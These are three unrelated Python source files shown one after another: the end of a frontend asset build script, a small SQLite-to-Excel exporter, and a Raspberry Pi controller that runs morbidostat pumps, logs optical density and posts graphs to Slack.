ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for HASH_DIR in HASH_DIRS:
hashes.update(get_file_hashes(HASH_DIR))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
ensure_directory_exists(HASHES_JS_FILEPATH)
with open(HASHES_JS_FILEPATH, 'w+') as hashes_js_file:
write_to_file_stream(
hashes_js_file, get_hashes_json_file_contents(hashes))
# Update hash dict with newly created hashes.js.
hashes.update({HASHES_JS_FILENAME: generate_md5_hash(HASHES_JS_FILEPATH)})
# Make sure /assets/hashes.js is available to the frontend.
_ensure_files_exist([HASHES_JS_FILEPATH])
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS, hashes)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS, hashes)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
COPY_INPUT_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
COPY_OUTPUT_DIRS = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR]
assert len(COPY_INPUT_DIRS) == len(COPY_OUTPUT_DIRS)
for i in xrange(len(COPY_INPUT_DIRS)):
safe_delete_directory_tree(COPY_OUTPUT_DIRS[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
COPY_INPUT_DIRS[i], COPY_OUTPUT_DIRS[i], hashes)
_execute_tasks(copy_tasks)
SOURCE_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
_verify_build(SOURCE_DIRS, COPY_OUTPUT_DIRS, hashes)
# Clean up un-hashed hashes.js.
safe_delete_file(HASHES_JS_FILEPATH)
print 'Build completed.'
def build():
"""The main method of this script.
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
"""
parser = optparse.OptionParser()
parser.add_option(
'--prod_env', action='store_true', default=False, dest='prod_mode')
parser.add_option(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
options = parser.parse_args()[0]
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only and not options.prod_mode:
raise Exception(
'minify_third_party_libs_only should not be set in non-prod mode.')
if options.prod_mode:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
if not options.minify_third_party_libs_only:
generate_build_directory()
if __name__ == '__main__':
build()
|
Tally_excel_sheet.py
|
import xlsxwriter
import sqlite3
import os
from styling import export_path
import threading
from tkinter import messagebox
def export_window():
try:
threading.Thread(target=convert_to_excel_sheet()).start()
messagebox.showinfo("Export", "Export sucessful")
except:
messagebox.showerror("Export","Export unsucessful")
def convert_to_excel_sheet():
workbook = xlsxwriter.Workbook(export_path)
worksheet = workbook.add_worksheet()
row = 0
column = 0
DEFAULT_PATH = os.path.join(os.path.dirname(__file__), 'appdata.db')
conn = sqlite3.connect(DEFAULT_PATH)
c = conn.cursor()
c.execute('SELECT * FROM TALLY')
element_list = ["Date","Name","Amount","Category","Payement","Site"]
for elements in element_list:
worksheet.write(row,column,elements)
column += 1
column = 0
row = 1
for item in c.fetchall():
for i in range(6):
if column != 2:
worksheet.write(row,column,item[column])
else:
worksheet.write_number(row,column,item[2])
column += 1
if column == 6:
row += 1
column = 0
workbook.close()
|
master.py
|
#!/usr/bin/python3
import time
import sys
from datetime import datetime
import csv
import threading
from multiprocessing import Process
import configparser
import fileinput
import RPi.GPIO as GPIO
import numpy as np
import os
import board
import busio
import adafruit_ads1x15.ads1015 as ADS
import adafruit_ads1x15.ads1115 as ADS_HR
from adafruit_ads1x15.analog_in import AnalogIn
from adafruit_mcp230xx.mcp23017 import MCP23017
import digitalio
import pandas as pd
import matplotlib.pyplot as plt
# Needed for Slack Integration
# import slack
from slackclient import SlackClient
#Logging
import logging
import plotter
import glob
mstart_time = datetime.now()
config = configparser.ConfigParser()
config.read('eve-conf.ini')
totsys = (''.join(config.sections())).count('CU')
actsys = []
for sysiter in range(totsys):
if config['CU' + str(sysiter+1)].getboolean('enabled'):
actsys.append(sysiter+1)
# slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
slack_client = SlackClient(config['MAIN']['slack_key'])
if slack_client.rtm_connect():
print ('Multiplexer Started.')
if (totsys == 1):
multimess = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There is ' + str(totsys) + ' system configured.')
)
else:
multimess = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There are ' + str(totsys) + ' systems configured.')
)
else:
sys.exit("No connection to Slack.")
chanid = multimess['channel']
multits = multimess['ts']
i2c_lock = [0]*totsys
i2c_q = []
graph_lock = [0]*totsys
graph_q = []
morbidostats = list()
comb_mesg = []
comb_saveloc = ''
comb_lat_sw = ['First','']
if config['MAIN'].getboolean('temp_sensor'): temp = 0.0
odcsvs = []
pumpcsvs = []
def IC_init():
adc = list()
gpioe = list()
adc_add = list()
gpio_add = list()
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled'):
adc_add.append(config[confsec].getint('a_address'))
if not config[confsec].getboolean('Pi_pins'):
gpio_add.append(config[confsec].getint('m_address'))
adc_add = list(set(adc_add))
gpio_add = list(set(gpio_add))
i2c = busio.I2C(board.SCL, board.SDA)
if adc_add:
for add in adc_add:
if config['MAIN'].getboolean('ads1115'):
adc.append(ADS_HR.ADS1115(i2c, address= add))
else:
adc.append(ADS.ADS1015(i2c, address= add))
if gpio_add:
for add in gpio_add:
gpioe.append(MCP23017(i2c, address=add))
return {'adc':adc, 'gpioe':gpioe, 'adc_add':adc_add, 'gpio_add':gpio_add}
def eve_starter():
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
print (confsec + ' enabled.')
if config['MAIN'].getboolean('repeat1_evar'):
morbidostats.append([Morbidostat([sysnum, 1], len(actsys), chips, slack_client), sysnum])
else:
morbidostats.append([Morbidostat([sysnum, sysnum], len(actsys), chips, slack_client), sysnum])
#Morbidostat(sysnum)
# thread.join
else:
print (confsec + ' not enabled. Skipping.')
slackms = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = confsec + ' is not enabled. Skipping.'
)
print ('Starting CUs')
for starti in range(len(morbidostats)):
morbidostats[starti][0].start()
if config['MAIN'].getboolean('comb_graph') and len(actsys) > 1:
combgen = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = 'Combined Graphs'
)
comblat = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = 'Latest Combined Graphs'
)
global comb_mesg
comb_mesg = [combgen['ts'], comblat['ts']]
def graph_controller():
while True:
if len(graph_q) is 0:
time.sleep(20)
else:
if graph_q[0] is 'C':
comb_grapher()
else:
morbidostats[graph_q[0]][0].graphOD()
graph_q.pop(0)
def i2c_controller():
while True:
if len(i2c_q) is 0:
time.sleep(0.05)
else:
if i2c_q[0][1] is 'O':
morbidostats[int(i2c_q[0][0])][0].get_OD()
elif i2c_q[0][1] is 'C':
morbidostats[int(i2c_q[0][0])][0].control_alg()
i2c_q.pop(0)
def live_plotter():
max_time = 0
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
temp_time = config[confsec].getfloat('time_between_saves')
if temp_time > max_time:
max_time = temp_time
time.sleep(max_time*60+5)
global odcsvs
global pumpcsvs
for starti in range(len(morbidostats)):
temp_locs = morbidostats[starti][0].file_locs()
odcsvs.append(temp_locs['ods'])
pumpcsvs.append(temp_locs['pumps'])
Process(target = plotter.Plotter, args = (actsys, odcsvs, pumpcsvs, config['MAIN']['hostname'])).start()
if config['MAIN'].getboolean('comb_graph') and len(actsys) > 1: threading.Thread(target = comb_graph_scheduler).start()
def comb_graph_scheduler():
global comb_saveloc
root_dir = config['MAIN']['save_location']
comb_saveloc = root_dir + '/Combined/' + str(datetime.now()) + '/'
os.makedirs(comb_saveloc)
while True:
time.sleep(config['MAIN'].getfloat('comb_graph_freq')*60)
global graph_q
graph_q.append('C')
def comb_grapher():
ods = []
leg = []
print('Generating Combined Graphs')
fig = plt.figure(dpi=140)
ax = plt.gca()
for i in actsys: leg.append('CU'+str(i))
for i in odcsvs:
ods.append(pd.read_csv(i,index_col='hour'))
ods[-1][['average']].plot(ax=ax,figsize=(7,5))
ax.legend(leg)
ax.set_ylabel('Raw OD')
ax.set_xlabel('Time(h)')
global comb_saveloc
fig.savefig(comb_saveloc + 'RawOD.png')
plt.close('all')
fig = None; ax = None
fig2 = plt.figure(dpi=140)
ax2 = plt.gca()
for i in ods:
i[['average']].divide(float(i.iloc[-1][['maxod']])).plot(ax=ax2,figsize=(7,5))
ax2.legend(leg)
ax2.set_ylabel('Scaled OD')
ax2.set_xlabel('Time(h)')
fig2.savefig(comb_saveloc + 'ScaledOD.png')
plt.close('all')
fig2 = None; ax2 = None
global comb_mesg
global comb_lat_sw
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
combgen_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[0],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
combgen_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[0],
title = "ScaledOD",
file = file_content
)
if comb_lat_sw[0] is 'First':
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
comblat_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
comblat_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
comb_lat_sw = [comblat_pic['file']['shares']['public'][chanid][0]['ts'], comblat_pics['file']['shares']['public'][chanid][0]['ts']]
else:
delcomb = slack_client.api_call(
"chat.delete",
channel = chanid,
ts = comb_lat_sw[0]
)
delcombs = slack_client.api_call(
"chat.delete",
channel = chanid,
ts = comb_lat_sw[1]
)
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
comblat_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
comblat_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
comb_lat_sw = [comblat_pic['file']['shares']['public'][chanid][0]['ts'], comblat_pics['file']['shares']['public'][chanid][0]['ts']]
def slackresponder():
while True:
try:
events = slack_client.rtm_read()
for event in events:
for sysitr in range(len(morbidostats)):
sysnum = morbidostats[sysitr][1]
evename = 'CU' + str(sysnum)
if (
event.get('channel') == chanid and
event.get('text') == evename and
event.get('thread_ts') == multits and
event.get('type') == 'message'
):
# print(event)
respmsg = slack_client.api_call(
"chat.postMessage",
username = 'Multiplexer',
icon_url = config['MAIN']['multi_icon'],
channel=mchan,
text = 'Generating Graphs for ' + evename,
thread_ts= multits
)
morbidostats[sysitr][0].graphOD()
time.sleep(60)
except KeyboardInterrupt:
break
except Exception as e:
# slack_client.api_call(
# "chat.postMessage",
# username = 'Multiplexer',
# icon_url = config['MAIN']['multi_icon'],
# channel=mchan,
# text = 'Slack Reponder *o*',
# thread_ts= multits
# )
# slack_client.api_call(
# "chat.postMessage",
# username = 'Multiplexer',
# icon_url = config['MAIN']['multi_icon'],
# channel=mchan,
# text = e,
# thread_ts= multits
# )
pass
# def temp_runner():
# if config['MAIN'].getboolean('temp_sensor'):
# while True:
# i2c_q.append('TT')
# time.sleep(3)
def temp_sensor_func():
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
while True:
f = open(device_file, 'r')
lines = f.readlines()
f.close()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = read_temp_raw()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
global temp
temp = float(temp_string) / 1000.0
time.sleep(3)
class Morbidostat:
def __init__(self, sysnum, actsys, chips, slack_client):
self.printing = False
self.sysnum = sysnum[0]
self.varnum = sysnum[1]
self.actsys = actsys
self.adc= chips['adc']
self.gpioe = chips['gpioe']
self.adc_add = chips['adc_add']
self.gpio_add = chips['gpio_add']
self.sysstr = 'CU' + str(self.sysnum)
self.varstr = 'CU' + str(self.varnum)
self.threads = {}
self.thread_locks = {'save' : threading.Lock(), 'adc' : threading.Lock(), 'dynL' : threading.Lock(), 'control_alg' : threading.Lock(), 'graphs' : threading.Lock(), 'threads' : threading.Lock()}
self.config = configparser.ConfigParser()
self.config.read('eve-conf.ini')
# Define Experiment Variables
self.time_between_pumps = self.config[self.varstr].getfloat('time_between_pumps')
self.OD_thr = self.config[self.varstr].getfloat('OD_thr')
self.OD_thr_set = False
self.OD_min = self.config[self.varstr].getfloat('OD_min')
self.OD_err = self.config[self.varstr].getfloat('OD_error')
self.time_between_ODs = self.config[self.varstr].getfloat('time_between_ODs') # how often to gather OD data, in seconds
self.time_between_graphs = self.config[self.varstr].getfloat('time_between_graphs') # how often to graph, in minutes
# OD_thr is the threshold above which to activate drug pump [vish bench tests: empty: 3.5V, Clear Vial: 0.265V, Very Cloudy Vial: 2.15V]
#time_between_writes = 1 # how often to write out OD data, in minutes
#loops_between_writes = (time_between_writes*60)/time_between_ODs # time bewteen writes in loops
self.time_between_saves = self.config[self.varstr].getfloat('time_between_saves')
# Set Up I2C to Read OD Data
# Create the I2C bus
self.P_drug_times = self.config[self.varstr].getfloat('P_drug_times')
self.drug_pump_flo_rate = self.config[self.varstr].getfloat('drug_pump_flo_rate')
self.P_nut_times = self.config[self.varstr].getfloat('P_nut_times')
self.nut_pump_flo_rate = self.config[self.varstr].getfloat('nut_pump_flo_rate')
self.P_waste_times = self.config[self.varstr].getfloat('P_waste_times')
self.waste_pump_flo_rate = self.config[self.varstr].getfloat('waste_pump_flo_rate')
self.running_data = [] # the list which will hold our 2-tuples of time and OD
self.pump_data = []
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.root_dir = self.config['MAIN']['save_location']
# self.currOD = np.zeros(num_cham)
self.currOD = 0
# averaged OD value
self.scaling = self.config[self.varstr].getboolean('scaling')
self.avOD = 0
self.maxOD = 0
self.OD_av_length = self.config[self.varstr].getint('OD_av_length')
# OD averaging buffer
self.avOD_buffer = [0] * self.OD_av_length #need to change for multiplexing
self.thresh_check = self.config[self.varstr].getfloat('time_thresh')
self.growthOD = []
self.growthrate = []
self.growthrate2 = []
self.growthrate_t = []
self.avefac = 30
self.instant_gr = 0
self.instant_gr2 = 0
self.graph_loops = self.actsys * self.config['MAIN'].getint('graph_resolution_fac')
self.elapsed_loop_time = 0
self.loops = 0
self.last_dilutionOD = 0
self.nut = 0
self.drug = 1
self.waste = 2
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.vial_drug_mass = 0
self.culture_vol = self.config[self.varstr].getint('culture_vol')
self.drug_flo_rate = self.config[self.varstr].getint('drug_flo_rate')
self.nut_flo_rate = self.config[self.varstr].getint('nut_flo_rate')
self.waste_flo_rate = self.config[self.varstr].getint('waste_flo_rate')
self.pump_act_times = []
self.dil_rate = 0
self.max_dil_rate = 0
self.temp_sensor = self.config['MAIN'].getboolean('temp_sensor')
self.total_time = self.config[self.varstr].getfloat('Exp_time_hours')*3600 #in seconds
self.loops_between_ODs = 1
self.loops_between_pumps = (self.time_between_pumps*60)/self.time_between_ODs # time between pumps in loops
# num_cham = 1 # number of morbidostat vials being used
self.photod = AnalogIn(self.adc[self.adc_add.index(self.config[self.sysstr].getint('a_address'))], getattr(ADS,'P'+ str(self.config[self.sysstr].getint('Analogin'))))
# Setup the GPIO Pins to Control the Pumps
self.pipins = self.config[self.sysstr].getboolean('pi_pins')
self.P_drug_pins = self.config[self.sysstr].getint('P_drug_pins')
self.P_nut_pins = self.config[self.sysstr].getint('P_nut_pins')
self.P_waste_pins = self.config[self.sysstr].getint('P_waste_pins')
self.P_LED_pins = self.config[self.sysstr].getint('P_led_pins')
self.pin_list = [self.P_drug_pins, self.P_nut_pins, self.P_waste_pins, self.P_LED_pins]
self.ledind = self.config[self.sysstr]['P_ind_pins'].isdigit()
if self.ledind:
self.P_ind_pins = self.config[self.sysstr].getint('P_ind_pins')
self.pin_list.append(self.P_ind_pins)
self.init_pins(self.pin_list)
self.init_time = datetime.now()
self.drug_name = self.config[self.varstr]['drug']
self.drug_conc = self.config[self.varstr].getfloat('drug_conc')
self.drug_vol = self.config[self.varstr].getfloat('drug_vol')
self.slack_client = SlackClient(self.config['MAIN']['slack_key'])
# self.slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
self.slack_usericon = self.config[self.sysstr]['slack_icon']
self.chan = self.config['MAIN']['slack_channel']
if self.P_drug_times * self.drug_pump_flo_rate != self.P_waste_times * self.waste_pump_flo_rate or self.P_nut_times * self.nut_pump_flo_rate != self.P_waste_times * self.waste_pump_flo_rate:
print('[%s] WARNING: Net volume of the CU will change over time with the currently configured pump times.' % self.sysstr)
volwarn = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = 'WARNING: Net volume of the CU will change over time with the currently configured pump times.'
)
initmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.init_time.strftime('Initialized at %H:%M:%S')
)
def start(self):
self.start_time = datetime.now()
if self.root_dir[-1] == '/': self.root_dir.pop(-1)
os.makedirs(self.root_dir + "/" + self.sysstr + "/" + str(self.start_time))
# self.elogr = logging.getLogger('self.elogr')
# self.elogr.setLevel(logging.DEBUG)
# self.elogrfh = logging.FileHandler('%s/%s/%s/exceptions.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.elogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.elogr.addHandler(self.elogrfh)
# self.ilogr = logging.getLogger('self.ilogr')
# self.ilogr.setLevel(logging.INFO)
# self.ilogrfh = logging.FileHandler('%s/%s/%s/info.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.ilogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.ilogr.addHandler(self.ilogrfh)
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.outfile_pump = "%s/%s/%s/pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','vial_drug_mass','dil_rate'])
file.close()
#Detailed Files
self.hr_outfile_OD = "%s/%s/%s/hr_ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.hr_outfile_pump = "%s/%s/%s/hr_pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','vial_drug_mass','dil_rate'])
file.close()
#TURN ON THE FAN HERE
# print('Experiment begun at %02s:%02s:%02s' % (self.start_time.hour, self.start_time.minute, self.start_time.second))
print(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
# self.ilogr.info(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
threading.Thread(target=self.on_timer).start()
self.initalmessage = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Experiment started at %H:%M:%S on %a - %b %d, %Y')
)
self.recgra = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Most recent graphs')
)
# self.history = self.slack_client.api_call("channels.history", channel=self.chanid, count = 1)
# self.threadts = self.history['messages'][0]['ts']
self.chanid = self.initalmessage['channel']
self.threadts = self.initalmessage['ts']
self.recgrats = self.recgra['ts']
self.firstrec = True
self.selection = self.config[self.varstr]['selection_alg']
self.vial_conc = self.config[self.varstr].getfloat('vial_conc')
def init_pins(self,pin_list):
if self.pipins:
GPIO.setmode(GPIO.BCM)
for pin in pin_list:
GPIO.setup(pin, GPIO.OUT)
else:
self.pins = [None]*(max(pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
for pin in self.pin_list:
self.pins[pin] = self.mcp.get_pin(pin)
self.pins[pin].direction = digitalio.Direction.OUTPUT
self.pins[pin].value = False
def get_OD(self):
print_buffer = 0
self.init_pins([self.P_LED_pins, self.P_ind_pins]) if self.ledind else self.init_pins([self.P_LED_pins])
try:
if self.pipins:
GPIO.output(self.P_LED_pins,1)
if self.ledind: GPIO.output(self.P_ind_pins,1)
else:
self.pins[self.P_LED_pins].value = True
if self.ledind: self.pins[self.P_ind_pins].value = True
time.sleep(0.1)
self.currOD = self.photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
if self.pipins:
GPIO.output(self.P_LED_pins,0)
if self.ledind: GPIO.output(self.P_ind_pins,0)
else:
self.pins[self.P_LED_pins].value = False
if self.ledind: self.pins[self.P_ind_pins].value = False
except:
print ('[%s] OD - WARNING ADC REQUEST CRASHED' % self.sysstr)
pass
self.avOD_buffer = self.avOD_buffer + [self.currOD]
self.avOD_buffer.pop(0)
self.avOD = sum(self.avOD_buffer)/len(self.avOD_buffer)
if self.avOD > self.maxOD: self.maxOD = self.avOD
self.thread_locks['adc'].release()
def pump_on(self,pump):
if self.pipins:
GPIO.output(pump, 1)
else:
self.pins[pump].value = True
print('[%s] Turning on pump %s' % (self.sysstr,pump))
def pump_off(self,pump):
if self.pipins:
GPIO.output(pump, 0)
else:
self.pins[pump].value = False
print('[%s] Turning off pump %s' % (self.sysstr,pump))
def all_pump_off(self):
if self.pipins:
for i in pin_list:
GPIO.output(i, 0)
else:
for i in pin_list:
self.pins[i].value = False
print('[%s] Turning off all pump' % (self.sysstr,pump))
def file_locs(self):
return {'ods':self.outfile_OD, 'pumps': self.outfile_pump}
def bufferdata(self):
if self.temp_sensor:
global temp
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, temp, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
else:
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
pulist = [self.nut,self.drug,self.waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.vial_drug_mass,self.dil_rate]
self.hr_pump_tmplist.append(pulist)
if self.max_nut < self.nut: self.max_nut = self.nut
if self.max_drug < self.drug: self.max_drug = self.drug
if self.max_waste < self.waste: self.max_waste = self.waste
if self.max_dil_rate < self.dil_rate: self.max_dil_rate = self.dil_rate
self.nut = 0
self.drug = 1
self.waste = 2
if (self.loops % self.graph_loops) == 0:
pulist = [self.max_nut,self.max_drug,self.max_waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.vial_drug_mass,self.max_dil_rate]
self.OD_tmplist.append(odlist)
self.pump_tmplist.append(pulist)
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.max_dil_rate = self.dil_rate
def savefunc(self):
self.thread_locks['save'].acquire()
self.bufferdata()
with open(self.hr_outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_OD_tmplist)
file.close()
with open(self.hr_outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_pump_tmplist)
file.close()
with open(self.outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.OD_tmplist)
file.close()
with open(self.outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.pump_tmplist)
file.close()
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.thread_locks['save'].release()
def graphOD(self):
print('[%s] Generating graph' % self.sysstr)
try:
elapmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD)),
thread_ts = self.threadts
)
allODs = pd.read_csv(self.outfile_OD, index_col='hour')
if self.scaling: allODs[['average']] = allODs[['average']]/float(allODs[['maxod']].iloc[-1])
if self.scaling: allODs[['min']] = allODs[['min']]/float(allODs[['maxod']].iloc[-1])
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot() #figsize=(10,10) in the plot
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
ODfig.savefig("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODplt = None; ODfig = None; fig = None
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
odmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODPlot",
file = file_content
)
allpumps = pd.read_csv(self.outfile_pump, index_col='hour') # cols: 'media', 'drug','waste','pump_time','hour','vial_drug_mass'
allconcs = allpumps[['vial_drug_mass']]/self.culture_vol
allconcs.rename(columns={'vial_drug_mass':'drug_conc'}, inplace=True)
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODplt.set_ylabel(ylabel='Average OD')
lines, labels = ODplt.get_legend_handles_labels()
DM = ODplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allconcs.plot(ax = DM, label='vial_drug_mass',color='tab:orange',legend=False)
DM.set_ylabel('%s Concentration (ug/mL)' % self.drug_name.capitalize())
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODplt.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODplt.figure = None; ODplt = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
concmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODConc",
file = file_content
)
